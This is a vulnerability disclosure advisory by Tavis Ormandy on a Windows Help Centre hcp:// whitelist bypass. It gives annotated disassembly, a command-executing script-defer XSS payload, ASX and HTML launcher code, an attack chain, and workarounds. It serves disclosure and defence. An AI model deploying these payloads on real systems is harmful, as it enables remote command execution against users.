Microsoft Windows Help Centre Handles – Malformed Escape Sequences Incorrectly (MS03-044)

  • 作者: Tavis Ormandy
    日期: 2010-06-10
  • 类别:
  • 来源:
  • Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly
    Help and Support Centre is the default application provided to access online
    documentation for Microsoft Windows. Microsoft supports accessing help documents
    directly via URLs by installing a protocol handler for the scheme "hcp", 
    a typical example is provided in the Windows XP Command Line Reference,
    available at
    Using hcp:// URLs is intended to be safe, as when invoked via the registered
    protocol handler the command line parameter /fromhcp is passed to the help
    centre application. This flag switches the help centre into a restricted mode,
    which will only permit a whitelisted set of help documents and parameters.
    This design, introduced in SP2, is reasonably sound. A whitelist of trusted
    documents is a safe way of allowing interaction with the documentation from
    less-trusted sources. Unfortunately, an implementation error in the whitelist
    allows it to be evaded.
    URLs are normalised and unescaped prior to validation using
    MPC::HTML::UrlUnescapeW(), which in turn uses MPC::HexToNum() to translate URL
    escape sequences into their original characters, the relevant code from
    helpctr.exe 5.1.2600.5512 (latest at time of writing) is below.
    .text:0106684C Unescape:
    .text:0106684Ccmp di, '%'; di contains the current wchar in the input URL.
    .text:01066850jnz short LiteralChar; if this is not a '%', it must be a literal character.
    .text:01066852pushesi; esi contains a pointer to the current position in URL to unescape.
    .text:01066853callds:wcslen; find the remaining length.
    .text:01066859cmp word ptr [esi], 'u'; if the next wchar is 'u', this is a unicode escape and I need 4 xdigits.
    .text:0106685Dpop ecx; this sequence calculates the number of wchars needed (4 or 2).
    .text:0106685Esetzcl ; i.e. %uXXXX (four needed), or %XX (two needed).
    .text:01066861mov dl, cl
    .text:01066863neg dl
    .text:01066865sbb edx, edx
    .text:01066867and edx, 3
    .text:0106686Ainc edx
    .text:0106686Binc edx
    .text:0106686Ccmp eax, edx ; test if I have enough characters in input to decode.
    .text:0106686Ejlshort LiteralChar; if not enough, this '%' is considered literal.
    .text:01066870testcl, cl
    .text:01066872movzx eax, word ptr [esi+2]
    .text:01066877jzshort NotUnicode
    .text:01066879callHexToNum ; call MPC::HexToNum() to convert this nibble (4 bits) to an integer.
    .text:0106687Emov edi, eax ; edi contains the running total of the value of this escape sequence.
    .text:01066880movzx eax, word ptr [esi+4]
    .text:01066885shl edi, 4 ; shift edi left 4 positions to make room for the next digit, i.e. total <<= 4;
    .text:0106688Doredi, eax ; or the next value into the 4-bit gap, i.e. total |= val.
    .text:0106688Fmovzx eax, word ptr [esi+6]; this process continues for the remaining wchars.
    .text:01066894shl edi, 4
    .text:0106689Coredi, eax
    .text:0106689Emovzx eax, word ptr [esi+8]
    .text:010668A3shl edi, 4
    .text:010668ABoredi, eax
    .text:010668ADadd esi, 0Ah; account for number of bytes (not chars) consumed by the escape.
    .text:010668B0jmp short FinishedEscape
    .text:010668B2 NotUnicode: 
    .text:010668B2callHexToNum ; this is the same code, but for non-unicode sequences (e.g. %41, instead of %u0041)
    .text:010668B7mov edi, eax
    .text:010668B9movzx eax, word ptr [esi]
    .text:010668C2shl eax, 4
    .text:010668C5oredi, eax
    .text:010668C7add esi, 4 ; account for number of bytes (not chars) consumed by the escape.
    .text:010668CA FinishedEscape:
    .text:010668CAtestdi, di
    .text:010668CDjzshort loc_10668DA
    .text:010668CF LiteralChar:
    .text:010668CFpushedi; append the final value to the normalised string using a std::string append.
    .text:010668D0mov ecx, [ebp+unescaped]
    .text:010668DAmov di, [esi]; fetch the next input character.
    .text:010668DDtestdi, di ; have we reached the NUL terminator?
    .text:010668E0jnz Unescape ; process next char.
    This code seems sane, but an error exists due to how MPC::HexToNum() handles
    error conditions, the relevant section of code is annotated below.
    .text:0102D32Amov edi, edi
    .text:0102D32Dmov ebp, esp; function prologue.
    .text:0102D32Fmov eax, [ebp+arg_0]; fetch the character to convert.
    .text:0102D332cmp eax, '0'
    .text:0102D335jlshort CheckUppercase; is it a digit?
    .text:0102D337cmp eax, '9'
    .text:0102D33Ajgshort CheckUppercase
    .text:0102D33Cadd eax, 0FFFFFFD0h ; atoi(), probably written val - '0' and optimised by compiler.
    .text:0102D33Fjmp short Complete 
    .text:0102D341 CheckUppercase:
    .text:0102D341cmp eax, 'A'
    .text:0102D344jlshort CheckLowercase; is it an uppercase xdigit?
    .text:0102D346cmp eax, 'F'
    .text:0102D349jgshort CheckLowercase
    .text:0102D34Badd eax, 0FFFFFFC9h ; atoi()
    .text:0102D34Ejmp short Complete 
    .text:0102D350 CheckLowercase:
    .text:0102D350cmp eax, 'a'
    .text:0102D353jlshort Invalid ; lowercase xdigit?
    .text:0102D355cmp eax, 'f'
    .text:0102D358jgshort Invalid
    .text:0102D35Aadd eax, 0FFFFFFA9h ; atoi()
    .text:0102D35Djmp short Complete
    .text:0102D35F Invalid: 
    .text:0102D35Foreax, 0FFFFFFFFh ; invalid character, return -1
    .text:0102D362 Complete: 
    .text:0102D362pop ebp
    Thus, MPC::HTML::UrlUnescapeW() does not check the return code of
    MPC::HexToNum() as required, and therefore can be manipulated into appending
    unexpected garbage onto std::strings. This error may appear benign, but we can
    use the miscalculations produced later in the code to evade the /fromhcp
    Assuming that we can access arbitrary help documents (full details of how the
    MPC:: error can be used to accomplish this will be explained below), we must
    identify a document that can be controlled purely from the URL used to access it.
    After browsing the documents available in a typical installation, the author
    concluded the only way to do this would be a cross site scripting error. After
    some careful searching, a candidate was discovered:
    This document is available in a default installation, and due to insufficient
    escaping in GetServerName() from sysinfo/commonFunc.js, the page is vulnerable
    to a DOM-type XSS. However, the escaping routine will abort encoding if characters
    such as '=' or '"' or others are specified. 
    It's not immediately obvious that this error is still exploitable, simple
    tricks like <img src=bad onerror=code> don't apply, and <script>code</script>
    isn't helpful as the code isn't evaluated again. In situations like this, the
    best course of action is to harass lcamtuf until he gives you the solution,
    which of course his encyclopaedic knowledge of browser security quirks produced
    <script defer>code</script>
    The defer property is an IE-ism which solves the problem, documented by
    Microsoft here
    Now that we are armed with knowledge of this trick, because these help
    documents are in a privileged zone, we can simply execute commands.
    You can test this with a command like so (assuming a recent IE):
    C:\> ver
    Microsoft Windows XP [Version 5.1.2600]
    C:\> c:\windows\pchealth\helpctr\binaries\helpctr.exe -url "hcp://system/sysinfo/sysinfomain.htm?svr=<script defer>eval(unescape('Run%28%22calc.exe%22%29'))</script>"
    While this is fun, this isn't a vulnerability unless an untrusted third party
    can force you to access it. Testing suggests that by default, accessing an
    hcp:// URL from within Internet Explorer >= 8, Firefox, Chrome (and presumably
    other browsers) will result in a prompt. Although most users will click through
    this prompt (perfectly reasonable, protocol handlers are intended to be safe),
    it's not a particularly exciting attack.
    I've found a way to avoid the prompt in a default Windows XP installation in all
    major browsers, The solution is to invoke the protocol handler from within an
    <iframe> in an ASX HtmlView element. There are probably other ways.
    The version of Windows Media Player that is available by default in Windows XP
    is WMP9, which installs an NPAPI and ActiveX plugin to render windows media
    content. Later versions also can be used, with some minor complications.
    Thus, the attack will look like this:
    $ cat simple.asx 
    <ASX VERSION="3.0">
    <PARAM name="HTMLView" value=""/>
     <REF href=""/>
    Where starthelp.html contains something like:
    $ cat starthelp.html 
    <iframe src="hcp://...">
    Forcing a user to read an .ASX file can be achieved in a cross-browser manner like so:
    $ cat launchurl.html 
    <head><title>Testing HCP</title></head>
    // HCP:// Vulnerability, Tavis Ormandy, June 2010.
    var asx = "";
    if (window.navigator.appName == "Microsoft Internet Explorer") {
    // Internet Explorer
    var o = document.createElement("OBJECT");
    o.setAttribute("classid", "clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6");
    } else {
    // Mozilla, Chrome, Etc.
    var o = document.createElement("IFRAME");
    o.setAttribute("src", asx);
    Therefore, we have the following interactions between multiple complex systems
    chained together:
    - From an html page, email, document, or other application force a user to
    fetch a .ASX file containing an HtmlView element.
    - From the HtmlView element, invoke the hcp protocol handler that would normally
    require confirmation.
    - From the HCP Protocol handler, bypass the /fromhcp whitelist by using the
    string miscalculations caused by failing to check the return code of
    - Once the whitelist has been defeated, invoke the Help document with a known
    DOM XSS due to GetServerName() insufficient escaping.
    - Use the defer property of a script tag to execute script in a privileged zone
    even after the page has been rendered.
    - Invoke an arbitrary command using the object.
    Figuring out how to use the MCP::HexToNum() error to defeat the /fromhcp
    whitelist took some analysis, but the result looks like the following.
    Affected Software
    At least Microsoft Windows XP, and Windows Server 2003 are affected. The attack
    is enhanced against IE >= 8 and other major browsers if Windows Media Player is
    available, but an installation is still vulnerable without it.
    Machines running version of IE less than 8 are, as usual, in even more trouble.
    In general, choice of browser, mail client or whatever is not relevant, they
    are all equally vulnerable.
    Upon successful exploitation, a remote attacker is able to execute arbitrary
    commands with the privileges of the current user.
    I've prepared a demonstration for a typical Windows XP installation with
    Internet Explorer 8, and the default Windows Media Player 9.
    In IE7 on Windows XP, just visiting this URL should be sufficient:
    Some minor modifications will be required to target other configurations, this
    is simply an attempt to demonstrate the problem. I'm sure the smart guys at
    metasploit will work on designing reliable attacks, as security professionals
    require these to do their jobs.
    Additionally, my demonstration is not intended to be stealthy, a real
    attack would barely be noticable to the victim. Perhaps the only unavoidable
    signal would be the momentary appearance of the Help Centre window before the
    attacker hides it. There are multiple trivial techniques that can be used to
    accomplish this.
    Browsers are useful to demonstrate the problem, but there are certainly other
    attack vectors, such as MUAs, documents, etc. Protocol handlers are designed to
    be used across applications.
    If you believe you may be affected, you should consider applying one of the
    workarounds described below.
    Few users rely on Help Centre urls, it is safe to temporarily disable them
    by removing HKCR\HCP\shell\open. This modification can be deployed easily using
    GPOs. For more information on Group Policy, see Microsoft's Group Policy site,
    A few caveats, 
    * I am aware that some support technicians rely on the Remote Assistance
    tool provided by the Help Center application using shortcuts like
    "explorer.exe hcp://CN=Microsoft%20Corporation,L=Re...". You can continue
    to use this technique by substituting "explorer.exe hcp://..." for
    "helpctr.exe /url hcp://...", without relying on the protocol handler.
    * One or two links in explorer, such as selecting "Help" from the Control
    Panel category view, may no longer function. If this concerns you, it is
    possible to gracefully degrade by replacing the protocol handler with a
    command to open a static intranet support page, e.g.
    "chrome.exe http://techsupport.intranet".
    * As always, if you do not use this feature, consider permanently disabling
    it in order to reduce attack surface. Historically, disabling unused
    protocol handlers has always proven to be a wise investment in security. 
    In the unlikely event that you heavily rely on the use of hcp://, I have
    created an unofficial (temporary) hotfix. You may use it under the terms of
    the GNU General Public License, version 2 or later. Of course, you should only
    use it as a last resort, carefully test the patch and make sure you understand
    what it does (full source code is included). It may be necessary to modify it
    to fit your needs.
    The package is availble for x86 here:
    [ NOTE: Please avoid linking to this file out of context, it is intended for
    consideration as a potential mitigation by experienced administrators,
    and is not suitable for consumption by end-users ]
    The hotfix intercepts helpctr.exe invokations, and patches MPC::HexToNum() to
    return zero on error, rather than -1. Nothing is changed on disk, and it can be
    safely removed at anytime. Of course, the result of an invalid unescape is still
    incorrect, but this specific vulnerability should be rendered inert. I would be
    greatful if the community could contribute bugfixes, testing, an x64 port, and
    so on. Once information is in the open, we can all collaborate on our
    collective security.
    Some clarifications,
    * Fixing the XSS is not a solution, the root cause is the whitelist
    evasion, any mitigation that does not address this is simply papering
    over the issue. An army of researchers that specialise in XSS exists, and
    i'm sure they will turn their attention to help documents once they
    realise their value. Assume more will be discovered.
    * That said, if you are an XSS expert, examples in whitelisted pages
    (/services/index, /services/search, etc.) would be useful, your skills
    could be helpful making this important software safe.
    * Removing Windows Media player is not a solution, it simply makes a fun
    demo for IE8 and other modern browsers.
    Finally, you should take this opportunity to disable all browser plugins and
    SFS ActiveX controls that are not regularly used. End users can do this
    themselves in Google Chrome by viewing about:plugins and disabling the plugins
    that are not required. In Mozilla Firefox, use the Tools->Add-ons->Plugins
    Microsoft was informed about this vulnerability on 5-Jun-2010, and they
    confirmed receipt of my report on the same day.
    Protocol handlers are a popular source of vulnerabilities, and hcp:// itself
    has been the target of attacks multiple times in the past. I've concluded that
    there's a significant possibility that attackers have studied this component,
    and releasing this information rapidly is in the best interest of security.
    Those of you with large support contracts are encouraged to tell your support
    representatives that you would like to see Microsoft invest in developing
    processes for faster responses to external security reports.
    This bug was discovered by Tavis Ormandy.
    Greetz to Neel, Mark, Redpig, Spoonm, Skylined, asiraP, LiquidK, ScaryBeasts,
    Hawkes, Jagger, and all my other pimp colleagues.
    Special thanks to lcamtuf for his assistance with the deferred execution
    problem. You should read his Browser Security Handbook if you need to
    understand how web browser security /really/ works.
    A colleague is organising a conference in Lucerne, Switzerland. He would really
    appreciate interesting papers from security people who want to talk about
    their research (travel, hotel, etc. covered).
    I would like to point out that if I had reported the MPC::HexToNum() issue
    without a working exploit, I would have been ignored.
    Without access to extremely smart colleagues, I would likely have given up,
    leaving you vulnerable to attack from those who just want root on your network
    and do not care about disclosure policies.
    This is another example of the problems with bug secrecy (or in PR speak,
    "responsible disclosure"), those of us who work hard to keep networks safe are
    forced to work in isolation without the open collaboration with our peers that
    we need, especially in complex cases like this, where creative thinking and
    input from experts in multiple disciplines is required to join the dots.
    A good place to start researching full disclosure would be this accessible
    and insightful essay by Bruce Schneier.
    His balanced coverage of the debate is also available in this essay.
    Finally, a reminder that this document represents my own work and opinions, I
    do not speak for or represent anyone but myself.
    hcp:// has been broken a few times over the years, for example:
    -, Delete arbitrary files using Help and Support Center
    -, HCP memory corruption by Dave Litchfield.
    The current design is actually pretty sound, I'm sure Microsoft are
    dissapointed they missed this flaw. In their defense, I think there's a good
    chance I would have also missed this in code review.